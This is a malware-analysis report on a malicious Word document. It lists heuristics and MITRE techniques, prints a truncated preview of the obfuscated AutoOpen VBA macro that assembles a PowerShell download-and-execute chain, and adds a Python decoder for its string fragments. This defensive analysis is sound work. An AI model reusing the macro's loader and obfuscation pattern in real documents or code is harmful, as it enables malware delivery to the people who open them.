Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing obfuscated VBA macros. Critical heuristics flag a Shell() call and an auto-exec (AutoOpen) loader that rebuilds its strings at run time rather than keeping them in the source. In the extracted module, the auto-exec function pads almost every statement with arithmetic on undefined variables (On Error Resume Next swallows the resulting errors) and repeatedly calls a helper, HJjkJKD(string, start, length), whose arguments line up with the junk padding on each literal, consistent with a Mid()-style substring cut. The substrings are PowerShell fragments: .Replace() calls that turn marker tokens (ihw, k1o) into [Char]39 (a single quote) and F6h or [Char]81+[Char]105+[Char]69 into [Char]124 (a pipe), a try/catch block, and what appears to be an $ENV:PUBLIC character-indexing construction, a common way to spell out iex. The VBA therefore assembles a download-and-execute pipeline at run time; the http://ccwcla... string extracted from the document body still carries the ihw marker token, so it is a fragment of that obfuscated text and not a usable address on its own.
Heuristics (7)
- VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- Obfuscated auto-exec VBA loader (critical) [OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ccwclaihw+ihwssYhacjPHaSXnzSX (in document text, OLE body). Note the ihw marker token from the macro: this is a piece of the obfuscated string, not a resolvable host.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace found in ordinary Office documents.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25435 bytes | f2e92b5e9d2ae0c831417b1d9bf0bbf214f137580a0e0a4e1b9dd9fc0e1a8542 |
Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wjIdphHG"
Function wpZdFWC()
On Error Resume Next
sdvmQjn = (GDYmq - Int(phzjj) * fXLrfajoLisdh / Oct(jTGus) - (zQXvcrQzZIFs - Sin(2969741)))
BSQmJaharV = (AnwjZD - Int(MscLuEoWWbF) * zuOAPOoKmOCZ / Oct(OZBsU) - (VoFkXukim - Sin(5259439)))
JIBRQLjsdl = (DhAESOlmiS - Int(tuwpDLjfndBB) * zsJrGffCiLK / Oct(YwvKQFlHk) - (KmhrYBHozBjQEa - Sin(980406)))
OKftamcDwJ = (PqEZwAfLJXFiQA) + HJjkJKD("NXzvmjnmf'w*MDr*ihw).NaoyD+oyDMe[3,11,2]-JoINihwihw)oyD).REPlace(oyD0froyD,oyDQk'+'1o+k1oiEoyD).REPla'+'ce(oyDihwoyD,[STRInG][CHar]39).REPlace(([CHar]122+SGDOrDffWavDYGwoK", 10, 145)
VSrwsR = (uNJpIrVFWYiUCk - Int(zNMJQmRZml) * AsikRwIn / Oct(VdfVXOPA) - (jZzTFWwCzNIdoW - Sin(612680)))
fnuTnK = (qdXmGmMOTGVhr - Int(BXQZFMShnLnP) * uimhHcdhlrOsuM / Oct(zzBOLLLkMOR) - (ZJpLwrnRjhYOF - Sin(2675191)))
lYDwqfoN = (QfCjL - Int(khoKZDnjtZSplD) * wjPBGuzSa / Oct(IzGvFKhGqpbB) - (Ynzip - Sin(1406052)))
jnJFMoTG = (PuzDhWJPGi) + HJjkJKD("OEtZq+ihwSpihw+ihwlit(8icQrQl", 6, 19)
DQHCnH = (ljuOwvf - Int(NHMJLUNonbbGX) * ClEMn / Oct(IhSuBrUpZv) - (YTvRwsbDtLc - Sin(3715011)))
ntiVXS = (LirjjI - Int(kHDijp) * ITzXOrsD / Oct(ckFtdItRfNMj) - (zlIQmwQQ - Sin(2413543)))
rpAqsqKiHp = (HaSkuoNcNIvP - Int(bPfbOmDScipTNO) * EtmWPwwSLYwdSl / Oct(aXknhBGWCdJSis) - (QhZOXUWYzA - Sin(5661562)))
mMpVzb = (fEEkPOYQGhno) + HJjkJKD("JStRinG][cHAR]39) F6h. ( VjnENV:PuBLic[13]+VjneNV:PuBlIC[5]+k1oxk1o)') -rEPlaCe 'k1o',[cHar]39-CRepLACE 'F6h',[cHar]124-CRepLwSitHBowuMjJiTUdMjJhrT", 2, 125)
FMBbGVjhnU = (OiEzl - Int(EEmTmUYlAkKi) * tRZzlf / Oct(TJWlwzFjSADSz) - (csLDzYhuTpYZ - Sin(2147846)))
LIkSj = (lojSUr - Int(uhAXoPrS) * jrkTQZNunHLYqh / Oct(XmwvdTl) - (GUiKKfJJpcTIjo - Sin(8453936)))
iDsUphVt = (MbmiNfuDAnACT - Int(ojvtiwiOCOizWw) * YjiuCjCjG / Oct(aaiKXfHqsnmN) - (KtLzYYAPJzjb - Sin(1288860)))
aDitj = (ktGjTZiHRD) + HJjkJKD("XwlIOpTcXrlwwUXzjw[CHar]67+[CHar]EUrrEFU", 19, 15)
waBbInb = (XBrliIGWQcwiQ - Int(zZfCnYj) * UHsspc / Oct(jowQNu) - (YbHril - Sin(7658399)))
DcwnWL = (EWOVXiwGzmMRhj - Int(lSdOknCRDTuBD) * vquSXDWiUFZhiz / Oct(AcYoiVZEWD) - (CELCdj - Sin(8978692)))
ZAahZFozJ = (BvSzKjW - Int(zYpCFD) * CqWMVZVmYOOA / Oct(TScsnWzi) - (dNILNbfjADz - Sin(3403545)))
lzBij = (DEfiXHdIkL) + HJjkJKD("nNPsDiRBwVzk+ihwid+8idihw+ihwk8ihw+ih'+'wid+8ideoyD+oyD-Iteihw+ihwm8iihw+ihwd)(Owihw+ihwtSihw+ihwDC'+')ihw+oyD+oyDihw;bomDFqIZDjFqnONuImzwrmtw", 13, 108)
EEhKPwbzlH = (PiFETMIEJLuGrN - Int(BAJGVY) * kRZotRc / Oct(ZwjklV) - (NpwwPQalCCWli - Sin(964562)))
vRWNSl = (YbYBwoiiTq - Int(CmzXHcpHmU) * WJwKfX / Oct(WjwBuXHLjWFj) - (fHnOnni - Sin(9045018)))
EQchzF = (wWSJQEOEoIGsw - Int(dArZQvs) * CDJcOWiW / Oct(srcjcjkHCziiw) - (SizJNvOOzB - Sin(5846635)))
ziiXpblCqR = (tkvfFofw) + HJjkJKD("fOjcNUWBliMlpaazWWvjYjfcwhROrwUyD+oyDihw+ihk1o+k1owrea'+'ihw+ihk1o+k1owk;}catch{ihwoyD+oyD+ihAatBHFDT", 32, 62)
qhvZzrqdww = (jFaruRM - Int(adirbEITk) * MFIRfORP / Oct(IwpvBBnuO) - (ItYfAqnkJrWs - Sin(9561315)))
bIkomtHfH = (zAsFSaMaf - Int(DYlhcqoKuicanZ) * brdHXA / Oct(wTzAIhco) - (iOibbEGHTD - Sin(2296454)))
TwQJBwAtC = (StWNTzqiiSHuoa - Int(jchGhFCu) * JzfWlWo / Oct(oQfZbnpj) - (FtPGjnBmWfmw - Sin(5872278)))
BmwadcfqL = (BTbBRGSNz) + HJjkJKD("pCQuIcSpZciJiNDzovmwwzqqrh83),oyD'+'bWYoyD))k1o).RePLacE(([cHAR]81+[cHAR]105+[cHAR]69),[StRinG][cH'+'AR]124).RePLacEIwTFjzZsLcPdI", 27, 90)
XaJpsz = (rCWJYPa - Int(kTRRJhkR) * QGtOquajsH / Oct(DdLojhUc) - (wzfSrEXE - Sin(5712240)))
BFLDqt = (buoztXqAAHwaf - Int(FNHIdh) * MIAjRbaWmW / Oct(FCfaOfSQs) - (UUUVTXNdzPb - Sin(9183188)))
llcvwITj = (PloQcwP - Int(OkbVdcfzbq) * ovrojKz / Oct(NsoHu) - (nPoZPp - Sin(3936028)))
OCTJSCnBJ = (sIorWvAJiGaJik) + HJjkJKD("wrZAWpWWZQjNSbid+8ihw+ihwid-objeihw+ihw'+'ct8id) SyihoyD+ok1o+k1oyDw+irGwzWTCvSHaJj", 15, 56)
UqjYpICL = (ZdhLqNqZMAsL - Int(mEnKHJjOSijCU) * rRILcbQjGLoAh / Oct(EJY
... (truncated)
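As an added example (not part of the analyzer output or of the sample), the following Python reproduces the loader's first stage for the HJjkJKD calls visible in the preview and then flattens the marker tokens that the fragments themselves spell out. It assumes HJjkJKD(s, start, length) behaves like VBA Mid(): the start/length pairs line up exactly with the junk padding on each literal (for example 19, 15 on the fourth call yields [CHar]67+[CHar]), and that alignment is the only basis for the assumption. The oyD rule is inferred from its use as a string delimiter; tokens with no rule on the page (8id, Vjn) are left in place.

```python
"""Stage-1 decoder for the junk-token Replace loader shape flagged above.

Added example, not the analyzer's code and not the sample's own decoder.
Assumption: HJjkJKD(s, start, length) == VBA Mid(s, start, length).
"""

# Fragments copied verbatim from the macro preview, with the (start, length)
# each call passes to HJjkJKD. Order is the order the calls appear in the source.
FRAGMENTS = [
    ("NXzvmjnmf'w*MDr*ihw).NaoyD+oyDMe[3,11,2]-JoINihwihw)oyD).REPlace(oyD0froyD,oyDQk'+'1o+k1oiEoyD).REPla'+'ce(oyDihwoyD,[STRInG][CHar]39).REPlace(([CHar]122+SGDOrDffWavDYGwoK", 10, 145),
    ("OEtZq+ihwSpihw+ihwlit(8icQrQl", 6, 19),
    ("JStRinG][cHAR]39) F6h. ( VjnENV:PuBLic[13]+VjneNV:PuBlIC[5]+k1oxk1o)') -rEPlaCe 'k1o',[cHar]39-CRepLACE 'F6h',[cHar]124-CRepLwSitHBowuMjJiTUdMjJhrT", 2, 125),
    ("XwlIOpTcXrlwwUXzjw[CHar]67+[CHar]EUrrEFU", 19, 15),
    ("nNPsDiRBwVzk+ihwid+8idihw+ihwk8ihw+ih'+'wid+8ideoyD+oyD-Iteihw+ihwm8iihw+ihwd)(Owihw+ihwtSihw+ihwDC'+')ihw+oyD+oyDihw;bomDFqIZDjFqnONuImzwrmtw", 13, 108),
    ("fOjcNUWBliMlpaazWWvjYjfcwhROrwUyD+oyDihw+ihk1o+k1owrea'+'ihw+ihk1o+k1owk;}catch{ihwoyD+oyD+ihAatBHFDT", 32, 62),
    ("pCQuIcSpZciJiNDzovmwwzqqrh83),oyD'+'bWYoyD))k1o).RePLacE(([cHAR]81+[cHAR]105+[cHAR]69),[StRinG][cH'+'AR]124).RePLacEIwTFjzZsLcPdI", 27, 90),
    ("wrZAWpWWZQjNSbid+8ihw+ihwid-objeihw+ihw'+'ct8id) SyihoyD+ok1o+k1oyDw+irGwzWTCvSHaJj", 15, 56),
]

# Marker-token rules, applied after the PowerShell-style '+' string breaks are
# removed. Provenance of each rule is noted; oyD is an assumption.
TOKEN_RULES = [
    ("ihw", "'"),  # .REPlace('ihw',[STRInG][CHar]39) is in fragment 1
    ("k1o", "'"),  # -rEPlaCe 'k1o',[cHar]39 is in fragment 3
    ("oyD", "'"),  # used as a string delimiter in fragment 1; quote assumed
    ("F6h", "|"),  # -CRepLACE 'F6h',[cHar]124 is in fragment 3
    ("QiE", "|"),  # .RePLacE([cHAR]81+[cHAR]105+[cHAR]69,[StRinG][cHAR]124) in fragment 7
]


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(s, start, length): 1-based start, at most `length` characters."""
    if start < 1:
        raise ValueError("Mid start is 1-based")
    return s[start - 1 : start - 1 + length]


def flatten(text: str, rules=TOKEN_RULES, max_passes: int = 10) -> str:
    """Collapse the nested concatenation/replace layers until nothing changes.

    Real execution peels these layers one at a time, each under iex. Doing it in
    one go is lossy (a Replace call consumes its own literal token, leaving ''')
    but is enough to read the PowerShell shape without executing anything.
    """
    for _ in range(max_passes):
        before = text
        text = text.replace("'+'", "")  # 'abc'+'def' string breaks
        for token, repl in rules:
            text = text.replace(token, repl)
        if text == before:
            break
    return text


def decode_fragments(fragments=FRAGMENTS):
    """Stage 1 (substring cut) followed by token flattening, in page order."""
    return [flatten(vba_mid(s, start, length)) for s, start, length in fragments]


if __name__ == "__main__":
    for i, frag in enumerate(decode_fragments(), 1):
        print(f"[{i}] {frag}")
```

On these inputs the first fragment flattens to `...').NaMe[3,11,2]-JoIN''...REPlace('0fr','|')` and the third to `...[13]+...[5]+'x')` followed by a pipe, which is enough to see that the macro is assembling a PowerShell pipeline. The final assembly order and the second-stage `8id` tokens are not visible in the truncated preview, so the output is read as fragments, not executed.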